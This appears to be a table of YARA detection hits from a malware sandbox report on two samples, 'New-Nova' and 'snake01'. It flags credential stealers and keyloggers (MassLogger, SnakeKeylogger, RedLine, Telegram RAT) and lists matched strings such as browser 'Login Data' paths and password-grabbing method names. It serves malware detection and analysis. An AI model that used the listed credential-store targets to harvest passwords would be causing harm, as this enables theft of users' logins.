9.2.Native_New-Nova.exe.22a183e.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.22a183e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
16.0.Native_New-Nova.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.Native_snake01.exe.49d0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.49d0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.49d0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.49c0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.49c0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34abe:$a1: get_encryptedPassword 0x34a92:$a2: get_encryptedUsername 0x34b56:$a3: get_timePasswordChanged 0x34a6e:$a4: get_passwordField 0x34ad4:$a5: set_encryptedPassword 0x348a1:$a7: get_logins 0x30108:$a10: KeyLoggerEventArgs 0x300d7:$a11: KeyLoggerEventArgsEventHandler 0x34975:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ed13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3e3b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x3e613:$a4: \Orbitum\User Data\Default\Login Data 0x3eff2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.49c0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32688:$s1: UnHook 0x32624:$s2: SetHook 0x3265d:$s3: CallNextHook 0x325ec:$s4: _hook
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0f20.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.49c0f20.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.49c0f20.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x48a78:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x48a4c:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x48b10:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x48a28:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x48a8e:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x4885b:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x47de5:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x4730e:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x45c70:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x45c3f:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4d327:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x4c825:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x4cb33:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data 0x4d92b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.4930000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.22202f6.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x48a78:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x48a4c:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x48b10:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x48a28:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x48a8e:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x4885b:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x47de5:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x4730e:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x45c70:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x45c3f:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3450190.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3450190.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.3426478.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3426478.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.35d6478.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.35d6478.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.35d6478.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.3.Native_New-Nova.exe.59f268.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
10.2.Native_snake01.exe.4930000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.4b10000.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930f20.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.4930f20.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.4930f20.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.4930f20.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
10.2.Native_snake01.exe.4930f20.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930f20.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
17.2.Native_snake01.exe.2221216.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
17.2.Native_snake01.exe.2221216.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.2221216.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
10.2.Native_snake01.exe.4930000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
17.2.Native_snake01.exe.22202f6.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.22202f6.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0000.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.49c0000.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.49c0000.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0000.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x368be:$a1: get_encryptedPassword 0x36892:$a2: get_encryptedUsername 0x36956:$a3: get_timePasswordChanged 0x3686e:$a4: get_passwordField 0x368d4:$a5: set_encryptedPassword 0x366a1:$a7: get_logins 0x31f08:$a10: KeyLoggerEventArgs 0x31ed7:$a11: KeyLoggerEventArgsEventHandler 0x36775:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0000.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x40b13:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x401b6:$a3: \Google\Chrome\User Data\Default\Login Data 0x40413:$a4: \Orbitum\User Data\Default\Login Data 0x40df2:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4d327:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x4c825:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x4cb33:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data 0x4d92b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.49d0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3450190.3.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.0.Native_New-Nova.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 4F 88 44 24 2B 88 44 24 2F B0 B9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.Native_New-Nova.exe.23e0000.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.50b0000.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.3450190.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3426478.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.22a183e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
